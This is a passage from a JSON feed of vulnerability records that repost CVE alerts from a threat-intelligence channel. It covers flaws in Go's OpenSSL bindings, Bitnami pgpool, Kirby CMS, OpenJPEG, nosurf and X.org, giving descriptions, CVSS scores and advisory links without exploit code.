https://access.redhat.com/errata/RHSA-2024:4502\n29. https://access.redhat.com/errata/RHSA-2024:4581\n30. https://access.redhat.com/errata/RHSA-2024:4591\n31. https://access.redhat.com/errata/RHSA-2024:4672\n32. https://access.redhat.com/errata/RHSA-2024:4699\n33. https://access.redhat.com/errata/RHSA-2024:4761\n34. https://access.redhat.com/errata/RHSA-2024:4762\n35. https://access.redhat.com/errata/RHSA-2024:4960\n36. https://access.redhat.com/errata/RHSA-2024:5258\n37. https://access.redhat.com/errata/RHSA-2024:5634\n38. https://access.redhat.com/errata/RHSA-2024:7262\n39. https://access.redhat.com/security/cve/CVE-2024-1394\n40. https://bugzilla.redhat.com/show_bug.cgi?id=2262921\n41. https://github.com/golang-fips/openssl/commit/85d31d0d257ce842c8a1e63c4d230ae850348136\n42. https://github.com/golang-fips/openssl/security/advisories/GHSA-78hx-gp6g-7mj6\n43. https://github.com/microsoft/go-crypto-openssl/commit/104fe7f6912788d2ad44602f77a0a0a62f1f259f\n44. https://pkg.go.dev/vuln/GO-2024-2660\n45. https://vuln.go.dev/ID/GO-2024-2660.json", "creation_timestamp": "2025-05-12T23:29:31.000000Z"}, {"uuid": "f1595ed9-e6f0-46cf-a7e7-6ea02a8e0ba6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:2562", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/16071", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-1394\n\ud83d\udd25 CVSS Score: 7.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: A memory leak flaw was found in Golang in the RSA encrypting/decrypting code, which might lead to a resource exhaustion vulnerability using attacker-controlled inputs\u200b. The memory leak happens in github.com/golang-fips/openssl/openssl/rsa.go#L113. The objects leaked are pkey\u200b and ctx\u200b. That function uses named return parameters to free pkey\u200b and ctx\u200b if there is an error initializing the context or setting the different properties. All return statements related to error cases follow the \"return nil, nil, fail(...)\" pattern, meaning that pkey\u200b and ctx\u200b will be nil inside the deferred function that should free them.\n\ud83d\udccf Published: 2024-03-21T12:16:38.790Z\n\ud83d\udccf Modified: 2025-05-12T23:02:02.486Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:1462\n2. https://access.redhat.com/errata/RHSA-2024:1468\n3. https://access.redhat.com/errata/RHSA-2024:1472\n4. https://access.redhat.com/errata/RHSA-2024:1501\n5. https://access.redhat.com/errata/RHSA-2024:1502\n6. https://access.redhat.com/errata/RHSA-2024:1561\n7. https://access.redhat.com/errata/RHSA-2024:1563\n8. https://access.redhat.com/errata/RHSA-2024:1566\n9. https://access.redhat.com/errata/RHSA-2024:1567\n10. https://access.redhat.com/errata/RHSA-2024:1574\n11. https://access.redhat.com/errata/RHSA-2024:1640\n12. https://access.redhat.com/errata/RHSA-2024:1644\n13. https://access.redhat.com/errata/RHSA-2024:1646\n14. https://access.redhat.com/errata/RHSA-2024:1763\n15. https://access.redhat.com/errata/RHSA-2024:1897\n16. https://access.redhat.com/errata/RHSA-2024:2562\n17. https://access.redhat.com/errata/RHSA-2024:2568\n18. https://access.redhat.com/errata/RHSA-2024:2569\n19. https://access.redhat.com/errata/RHSA-2024:2729\n20. https://access.redhat.com/errata/RHSA-2024:2730\n21. https://access.redhat.com/errata/RHSA-2024:2767\n22. https://access.redhat.com/errata/RHSA-2024:3265\n23. https://access.redhat.com/errata/RHSA-2024:3352\n24. https://access.redhat.com/errata/RHSA-2024:4146\n25. https://access.redhat.com/errata/RHSA-2024:4371\n26. https://access.redhat.com/errata/RHSA-2024:4378\n27. https://access.redhat.com/errata/RHSA-2024:4379\n28. https://access.redhat.com/errata/RHSA-2024:4502\n29. https://access.redhat.com/errata/RHSA-2024:4581\n30. https://access.redhat.com/errata/RHSA-2024:4591\n31. https://access.redhat.com/errata/RHSA-2024:4672\n32. https://access.redhat.com/errata/RHSA-2024:4699\n33. https://access.redhat.com/errata/RHSA-2024:4761\n34. https://access.redhat.com/errata/RHSA-2024:4762\n35. https://access.redhat.com/errata/RHSA-2024:4960\n36. https://access.redhat.com/errata/RHSA-2024:5258\n37. https://access.redhat.com/errata/RHSA-2024:5634\n38. https://access.redhat.com/errata/RHSA-2024:7262\n39. https://access.redhat.com/security/cve/CVE-2024-1394\n40. https://bugzilla.redhat.com/show_bug.cgi?id=2262921\n41. https://github.com/golang-fips/openssl/commit/85d31d0d257ce842c8a1e63c4d230ae850348136\n42. https://github.com/golang-fips/openssl/security/advisories/GHSA-78hx-gp6g-7mj6\n43. https://github.com/microsoft/go-crypto-openssl/commit/104fe7f6912788d2ad44602f77a0a0a62f1f259f\n44. https://pkg.go.dev/vuln/GO-2024-2660\n45. https://vuln.go.dev/ID/GO-2024-2660.json", "creation_timestamp": "2025-05-12T23:29:31.000000Z"}, {"uuid": "59ff9597-e4b3-4f52-b80b-a1ee0f0e2ec9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:1646", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/16071", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-1394\n\ud83d\udd25 CVSS Score: 7.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: A memory leak flaw was found in Golang in the RSA encrypting/decrypting code, which might lead to a resource exhaustion vulnerability using attacker-controlled inputs\u200b. The memory leak happens in github.com/golang-fips/openssl/openssl/rsa.go#L113. The objects leaked are pkey\u200b and ctx\u200b. That function uses named return parameters to free pkey\u200b and ctx\u200b if there is an error initializing the context or setting the different properties. All return statements related to error cases follow the \"return nil, nil, fail(...)\" pattern, meaning that pkey\u200b and ctx\u200b will be nil inside the deferred function that should free them.\n\ud83d\udccf Published: 2024-03-21T12:16:38.790Z\n\ud83d\udccf Modified: 2025-05-12T23:02:02.486Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:1462\n2. https://access.redhat.com/errata/RHSA-2024:1468\n3. https://access.redhat.com/errata/RHSA-2024:1472\n4. https://access.redhat.com/errata/RHSA-2024:1501\n5. https://access.redhat.com/errata/RHSA-2024:1502\n6. https://access.redhat.com/errata/RHSA-2024:1561\n7. https://access.redhat.com/errata/RHSA-2024:1563\n8. https://access.redhat.com/errata/RHSA-2024:1566\n9. https://access.redhat.com/errata/RHSA-2024:1567\n10. https://access.redhat.com/errata/RHSA-2024:1574\n11. https://access.redhat.com/errata/RHSA-2024:1640\n12. https://access.redhat.com/errata/RHSA-2024:1644\n13. https://access.redhat.com/errata/RHSA-2024:1646\n14. https://access.redhat.com/errata/RHSA-2024:1763\n15. https://access.redhat.com/errata/RHSA-2024:1897\n16. https://access.redhat.com/errata/RHSA-2024:2562\n17. https://access.redhat.com/errata/RHSA-2024:2568\n18. https://access.redhat.com/errata/RHSA-2024:2569\n19. https://access.redhat.com/errata/RHSA-2024:2729\n20. https://access.redhat.com/errata/RHSA-2024:2730\n21. https://access.redhat.com/errata/RHSA-2024:2767\n22. https://access.redhat.com/errata/RHSA-2024:3265\n23. https://access.redhat.com/errata/RHSA-2024:3352\n24. https://access.redhat.com/errata/RHSA-2024:4146\n25. https://access.redhat.com/errata/RHSA-2024:4371\n26. https://access.redhat.com/errata/RHSA-2024:4378\n27. https://access.redhat.com/errata/RHSA-2024:4379\n28. https://access.redhat.com/errata/RHSA-2024:4502\n29. https://access.redhat.com/errata/RHSA-2024:4581\n30. https://access.redhat.com/errata/RHSA-2024:4591\n31. https://access.redhat.com/errata/RHSA-2024:4672\n32. https://access.redhat.com/errata/RHSA-2024:4699\n33. https://access.redhat.com/errata/RHSA-2024:4761\n34. https://access.redhat.com/errata/RHSA-2024:4762\n35. https://access.redhat.com/errata/RHSA-2024:4960\n36. https://access.redhat.com/errata/RHSA-2024:5258\n37. https://access.redhat.com/errata/RHSA-2024:5634\n38. https://access.redhat.com/errata/RHSA-2024:7262\n39. https://access.redhat.com/security/cve/CVE-2024-1394\n40. https://bugzilla.redhat.com/show_bug.cgi?id=2262921\n41. https://github.com/golang-fips/openssl/commit/85d31d0d257ce842c8a1e63c4d230ae850348136\n42. https://github.com/golang-fips/openssl/security/advisories/GHSA-78hx-gp6g-7mj6\n43. https://github.com/microsoft/go-crypto-openssl/commit/104fe7f6912788d2ad44602f77a0a0a62f1f259f\n44. https://pkg.go.dev/vuln/GO-2024-2660\n45. https://vuln.go.dev/ID/GO-2024-2660.json", "creation_timestamp": "2025-05-12T23:29:31.000000Z"}, {"uuid": "25667f38-ec1d-4db5-a528-26f84fa1b1fb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-MX38-X658-5FWJ", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/16090", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-22248\n\ud83d\udd25 CVSS Score: 9.4 (cvssV4_0, Vector: CVSS:4.0/AV:A/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H)\n\ud83d\udd39 Description: The bitnami/pgpool\u00a0Docker image, and the bitnami/postgres-ha\u00a0k8s chart, under default configurations, comes with an 'repmgr' user that allows unauthenticated access to the database inside the cluster.\u00a0The PGPOOL_SR_CHECK_USER\u00a0is the user that Pgpool itself uses to perform streaming replication checks against nodes, and should not be at trust\u00a0level. This allows to log into a PostgreSQL database using the repgmr\u00a0user without authentication. If Pgpool is exposed externally, a potential attacker could use this user to get access to the service. This is also present within the bitnami/postgres-ha\u00a0Kubernetes Helm chart.\n\ud83d\udccf Published: 2025-05-13T09:13:30.613Z\n\ud83d\udccf Modified: 2025-05-13T09:13:30.613Z\n\ud83d\udd17 References:\n1. https://github.com/bitnami/charts/security/advisories/GHSA-mx38-x658-5fwj", "creation_timestamp": "2025-05-13T09:30:38.000000Z"}, {"uuid": "76b7c827-6b0f-4e69-a0e0-efdaaa2866da", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-X275-H9J4-7P4H", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/16214", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-31493\n\ud83d\udd25 CVSS Score: 6.3 (cvssV4_0, Vector: CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N)\n\ud83d\udd39 Description: Kirby is an open-source content management system. A vulnerability in versions prior to 3.9.8.3, 3.10.1.2, and 4.7.1 affects all Kirby sites that use the `collection()` helper or `$kirby-&gt;collection()` method with a dynamic collection name (such as a collection name that depends on request or user data). Sites that only use fixed calls to the `collection()` helper/`$kirby-&gt;collection()` method (i.e. calls with a simple string for the collection name) are *not* affected. A missing path traversal check allowed attackers to navigate and access all files on the server that were accessible to the PHP process, including files outside of the collections root or even outside of the Kirby installation. PHP code within such files was executed. Such attacks first require an attack vector in the site code that is caused by dynamic collection names, such as `collection('tags-' . get('tags'))`. It generally also requires knowledge of the site structure and the server's file system by the attacker, although it can be possible to find vulnerable setups through automated methods such as fuzzing. In a vulnerable setup, this could cause damage to the confidentiality and integrity of the server. The problem has been patched in Kirby 3.9.8.3, Kirby 3.10.1.2, and Kirby 4.7.1. In all of the mentioned releases, the maintainers of Kirby have added a check for the collection path that ensures that the resulting path is contained within the configured collections root. Collection paths that point outside of the collections root will not be loaded.\n\ud83d\udccf Published: 2025-05-13T15:24:40.178Z\n\ud83d\udccf Modified: 2025-05-13T19:08:37.490Z\n\ud83d\udd17 References:\n1. https://github.com/getkirby/kirby/security/advisories/GHSA-x275-h9j4-7p4h\n2. https://github.com/getkirby/kirby/releases/tag/3.10.1.2\n3. https://github.com/getkirby/kirby/releases/tag/3.9.8.3\n4. https://github.com/getkirby/kirby/releases/tag/4.7.1", "creation_timestamp": "2025-05-13T19:31:11.000000Z"}, {"uuid": "a331b2c0-cbd4-453b-a7b6-36d9efacb2cd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:7309", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/16089", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-56826\n\ud83d\udd25 CVSS Score: 5.6 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:L/I:N/A:H)\n\ud83d\udd39 Description: A flaw was found in the OpenJPEG project. A heap buffer overflow condition may be triggered when certain options are specified while using the opj_decompress utility.  This can lead to an application crash or other undefined behavior.\n\ud83d\udccf Published: 2025-01-09T03:40:24.613Z\n\ud83d\udccf Modified: 2025-05-13T09:15:03.349Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:7309\n2. https://access.redhat.com/security/cve/CVE-2024-56826\n3. https://bugzilla.redhat.com/show_bug.cgi?id=2335172\n4. https://github.com/uclouvain/openjpeg/commit/e492644fbded4c820ca55b5e50e598d346e850e8\n5. https://github.com/uclouvain/openjpeg/issues/1563", "creation_timestamp": "2025-05-13T09:30:37.000000Z"}, {"uuid": "6c76901a-257f-4d09-b7c4-78562d190686", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-FW82-87P8-V6HP", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/16147", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-30159\n\ud83d\udd25 CVSS Score: 6.3 (cvssV4_0, Vector: CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N)\n\ud83d\udd39 Description: Kirby is an open-source content management system. A vulnerability in versions prior to 3.9.8.3, 3.10.1.2, and 4.7.1 affects all Kirby sites that use the `snippet()` helper or `$kirby-&gt;snippet()` method with a dynamic snippet name (such as a snippet name that depends on request or user data). Sites that only use fixed calls to the `snippet()` helper/`$kirby-&gt;snippet()` method (i.e. calls with a simple string for the snippet name) are *not* affected. A missing path traversal check allowed attackers to navigate and access all files on the server that were accessible to the PHP process, including files outside of the snippets root or even outside of the Kirby installation. PHP code within such files was executed. Such attacks first require an attack vector in the site code that is caused by dynamic snippet names, such as `snippet('tags-' . get('tags'))`. It generally also requires knowledge of the site structure and the server's file system by the attacker, although it can be possible to find vulnerable setups through automated methods such as fuzzing. In a vulnerable setup, this could cause damage to the confidentiality and integrity of the server. The problem has been patched in Kirby 3.9.8.3, Kirby 3.10.1.2, and Kirby 4.7.1. In all of the mentioned releases, Kirby maintainers have added a check for the snippet path that ensures that the resulting path is contained within the configured snippets root. Snippet paths that point outside of the snippets root will not be loaded.\n\ud83d\udccf Published: 2025-05-13T15:07:02.920Z\n\ud83d\udccf Modified: 2025-05-13T15:07:02.920Z\n\ud83d\udd17 References:\n1. https://github.com/getkirby/kirby/security/advisories/GHSA-fw82-87p8-v6hp\n2. https://github.com/getkirby/kirby/releases/tag/3.10.1.2\n3. https://github.com/getkirby/kirby/releases/tag/3.9.8.3\n4. https://github.com/getkirby/kirby/releases/tag/4.7.1", "creation_timestamp": "2025-05-13T15:31:21.000000Z"}, {"uuid": "7d810dd3-34b8-47e7-9fbe-504150a391c8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-W9HF-35Q4-VCJW", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/16215", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-46721\n\ud83d\udd25 CVSS Score: 6 (cvssV4_0, Vector: CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N)\n\ud83d\udd39 Description: nosurf is cross-site request forgery (CSRF) protection middleware for Go. A vulnerability in versions prior to 1.2.0 allows an attacker who controls content on the target site, or on a subdomain of the target site (either via XSS, or otherwise) to bypass CSRF checks and issue requests on user's behalf. Due to misuse of the Go `net/http` library, nosurf categorizes all incoming requests as plain-text HTTP requests, in which case the `Referer` header is not checked to have the same origin as the target webpage. If the attacker has control over HTML contents on either the target website (e.g. `example.com`), or on a website hosted on a subdomain of the target (e.g. `attacker.example.com`), they will also be able to manipulate cookies set for the target website. By acquiring the secret CSRF token from the cookie, or overriding the cookie with a new token known to the attacker, `attacker.example.com` is able to craft cross-site requests to `example.com`. A patch for the issue was released in nosurf 1.2.0. In lieu of upgrading to a patched version of nosurf, users may additionally use another HTTP middleware to ensure that a non-safe HTTP request is coming from the same origin (e.g. by requiring a `Sec-Fetch-Site: same-origin` header in the request).\n\ud83d\udccf Published: 2025-05-13T15:29:30.068Z\n\ud83d\udccf Modified: 2025-05-13T19:07:23.093Z\n\ud83d\udd17 References:\n1. https://github.com/justinas/nosurf/security/advisories/GHSA-w9hf-35q4-vcjw\n2. https://github.com/justinas/nosurf/commit/ec9bb776d8e5ba9e906b6eb70428f4e7b009feee\n3. https://github.com/advisories/GHSA-rq77-p4h8-4crw\n4. https://github.com/justinas/nosurf-cve-2025-46721\n5. https://github.com/justinas/nosurf/releases/tag/v1.2.0", "creation_timestamp": "2025-05-13T19:31:12.000000Z"}, {"uuid": "13cfbfb8-8ebb-47bf-bef7-8a664ed18e18", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:9818", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/16122", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-9632\n\ud83d\udd25 CVSS Score: 7.8 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: A flaw was found in the X.org server. Due to improperly tracked allocation size in _XkbSetCompatMap, a local attacker may be able to trigger a buffer overflow condition via a specially crafted payload, leading to denial of service or local privilege escalation in distributions where the X.org server is run with root privileges.\n\ud83d\udccf Published: 2024-10-30T07:42:35.320Z\n\ud83d\udccf Modified: 2025-05-13T14:17:46.279Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:10090\n2. https://access.redhat.com/errata/RHSA-2024:8798\n3. https://access.redhat.com/errata/RHSA-2024:9540\n4. https://access.redhat.com/errata/RHSA-2024:9579\n5. https://access.redhat.com/errata/RHSA-2024:9601\n6. https://access.redhat.com/errata/RHSA-2024:9690\n7. https://access.redhat.com/errata/RHSA-2024:9816\n8. https://access.redhat.com/errata/RHSA-2024:9818\n9. https://access.redhat.com/errata/RHSA-2024:9819\n10. https://access.redhat.com/errata/RHSA-2024:9820\n11. https://access.redhat.com/errata/RHSA-2024:9901\n12. https://access.redhat.com/errata/RHSA-2025:7163\n13. https://access.redhat.com/errata/RHSA-2025:7165\n14. https://access.redhat.com/security/cve/CVE-2024-9632\n15. https://bugzilla.redhat.com/show_bug.cgi?id=2317233", "creation_timestamp": "2025-05-13T14:30:42.000000Z"}, {"uuid": "e23de71b-6e7c-49f5-8ee2-5f936f5adccd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:9820", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/16122", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-9632\n\ud83d\udd25 CVSS Score: 7.8 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: A flaw was found in the X.org server. Due to improperly tracked allocation size in _XkbSetCompatMap, a local attacker may be able to trigger a buffer overflow condition via a specially crafted payload, leading to denial of service or local privilege escalation in distributions where the X.org server is run with root privileges.\n\ud83d\udccf Published: 2024-10-30T07:42:35.320Z\n\ud83d\udccf Modified: 2025-05-13T14:17:46.279Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:10090\n2. https://access.redhat.com/errata/RHSA-2024:8798\n3. https://access.redhat.com/errata/RHSA-2024:9540\n4. https://access.redhat.com/errata/RHSA-2024:9579\n5. https://access.redhat.com/errata/RHSA-2024:9601\n6. https://access.redhat.com/errata/RHSA-2024:9690\n7. https://access.redhat.com/errata/RHSA-2024:9816\n8. https://access.redhat.com/errata/RHSA-2024:9818\n9. https://access.redhat.com/errata/RHSA-2024:9819\n10. https://access.redhat.com/errata/RHSA-2024:9820\n11. https://access.redhat.com/errata/RHSA-2024:9901\n12. https://access.redhat.com/errata/RHSA-2025:7163\n13. https://access.redhat.com/errata/RHSA-2025:7165\n14. https://access.redhat.com/security/cve/CVE-2024-9632\n15. https://bugzilla.redhat.com/show_bug.cgi?id=2317233", "creation_timestamp": "2025-05-13T14:30:42.000000Z"}, {"uuid": "7b4d889d-87c6-4bcc-b52a-277220f594eb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:9901", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/16122", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-9632\n\ud83d\udd25 CVSS Score: 7.8 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: A flaw was found in the X.org server. Due to improperly tracked allocation size in _XkbSetCompatMap, a local attacker may be able to trigger a buffer overflow condition via a specially crafted payload, leading to denial of service or local privilege escalation in distributions where the X.org server is run with root privileges.\n\ud83d\udccf Published: 2024-10-30T07:42:35.320Z\n\ud83d\udccf Modified: 2025-05-13T14:17:46.279Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:10090\n2. https://access.redhat.com/errata/RHSA-2024:8798\n3. https://access.redhat.com/errata/RHSA-2024:9540\n4. https://access.redhat.com/errata/RHSA-2024:9579\n5. https://access.redhat.com/errata/RHSA-2024:9601\n6. https://access.redhat.com/errata/RHSA-2024:9690\n7. https://access.redhat.com/errata/RHSA-2024:9816\n8. https://access.redhat.com/errata/RHSA-2024:9818\n9. https://access.redhat.com/errata/RHSA-2024:9819\n10. https://access.redhat.com/errata/RHSA-2024:9820\n11. https://access.redhat.com/errata/RHSA-2024:9901\n12. https://access.redhat.com/errata/RHSA-2025:7163\n13. https://access.redhat.com/errata/RHSA-2025:7165\n14. https://access.redhat.com/security/cve/CVE-2024-9632\n15. https://bugzilla.redhat.com/show_bug.cgi?id=2317233", "creation_timestamp": "2025-05-13T14:30:42.000000Z"}, {"uuid": "f4a599d1-9e03-491c-ad22-ab517bb46d04", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:9579", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/16122", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-9632\n\ud83d\udd25 CVSS Score: 7.8 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: A flaw was found in the X.org server. Due to improperly tracked allocation size in _XkbSetCompatMap, a local attacker may be able to trigger a buffer overflow condition via a specially crafted payload, leading to denial of service or local privilege escalation in distributions where the X.org server is run with root privileges.\n\ud83d\udccf Published: 2024-10-30T07:42:35.320Z\n\ud83d\udccf Modified: 2025-05-13T14:17:46.279Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:10090\n2. https://access.redhat.com/errata/RHSA-2024:8798\n3. https://access.redhat.com/errata/RHSA-2024:9540\n4. https://access.redhat.com/errata/RHSA-2024:9579\n5. https://access.redhat.com/errata/RHSA-2024:9601\n6. https://access.redhat.com/errata/RHSA-2024:9690\n7. https://access.redhat.com/errata/RHSA-2024:9816\n8. https://access.redhat.com/errata/RHSA-2024:9818\n9. https://access.redhat.com/errata/RHSA-2024:9819\n10. https://access.redhat.com/errata/RHSA-2024:9820\n11. https://access.redhat.com/errata/RHSA-2024:9901\n12. https://access.redhat.com/errata/RHSA-2025:7163\n13. https://access.redhat.com/errata/RHSA-2025:7165\n14. https://access.redhat.com/security/cve/CVE-2024-9632\n15. https://bugzilla.redhat.com/show_bug.cgi?id=2317233", "creation_timestamp": "2025-05-13T14:30:42.000000Z"}, {"uuid": "b91dd270-a38f-492e-84a8-b12f7f530ae5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:9601", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/16122", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-9632\n\ud83d\udd25 CVSS Score: 7.8 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: A flaw was found in the X.org server. Due to improperly tracked allocation size in _XkbSetCompatMap, a local attacker may be able to trigger a buffer overflow condition via a specially crafted payload, leading to denial of service or local privilege escalation in distributions where the X.org server is run with root privileges.\n\ud83d\udccf Published: 2024-10-30T07:42:35.320Z\n\ud83d\udccf Modified: 2025-05-13T14:17:46.279Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:10090\n2. https://access.redhat.com/errata/RHSA-2024:8798\n3. https://access.redhat.com/errata/RHSA-2024:9540\n4. https://access.redhat.com/errata/RHSA-2024:9579\n5. https://access.redhat.com/errata/RHSA-2024:9601\n6. https://access.redhat.com/errata/RHSA-2024:9690\n7. https://access.redhat.com/errata/RHSA-2024:9816\n8. https://access.redhat.com/errata/RHSA-2024:9818\n9. https://access.redhat.com/errata/RHSA-2024:9819\n10. https://access.redhat.com/errata/RHSA-2024:9820\n11. https://access.redhat.com/errata/RHSA-2024:9901\n12. https://access.redhat.com/errata/RHSA-2025:7163\n13. https://access.redhat.com/errata/RHSA-2025:7165\n14. https://access.redhat.com/security/cve/CVE-2024-9632\n15. https://bugzilla.redhat.com/show_bug.cgi?id=2317233", "creation_timestamp": "2025-05-13T14:30:42.000000Z"}, {"uuid": "563d912b-2160-47b0-a328-a4766e037dbe", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:9690", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/16122", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-9632\n\ud83d\udd25 CVSS Score: 7.8 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: A flaw was found in the X.org server. Due to improperly tracked allocation size in _XkbSetCompatMap, a local attacker may be able to trigger a buffer overflow condition via a specially crafted payload, leading to denial of service or local privilege escalation in distributions where the X.org server is run with root privileges.\n\ud83d\udccf Published: 2024-10-30T07:42:35.320Z\n\ud83d\udccf Modified: 2025-05-13T14:17:46.279Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:10090\n2. https://access.redhat.com/errata/RHSA-2024:8798\n3. https://access.redhat.com/errata/RHSA-2024:9540\n4. https://access.redhat.com/errata/RHSA-2024:9579\n5. https://access.redhat.com/errata/RHSA-2024:9601\n6. https://access.redhat.com/errata/RHSA-2024:9690\n7. https://access.redhat.com/errata/RHSA-2024:9816\n8. https://access.redhat.com/errata/RHSA-2024:9818\n9. https://access.redhat.com/errata/RHSA-2024:9819\n10. https://access.redhat.com/errata/RHSA-2024:9820\n11. https://access.redhat.com/errata/RHSA-2024:9901\n12. https://access.redhat.com/errata/RHSA-2025:7163\n13. https://access.redhat.com/errata/RHSA-2025:7165\n14. https://access.redhat.com/security/cve/CVE-2024-9632\n15. https://bugzilla.redhat.com/show_bug.cgi?id=2317233", "creation_timestamp": "2025-05-13T14:30:42.000000Z"}, {"uuid": "1a0c916d-5355-4df1-988b-a6330b57b001", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:7163", "type": "seen", "source": 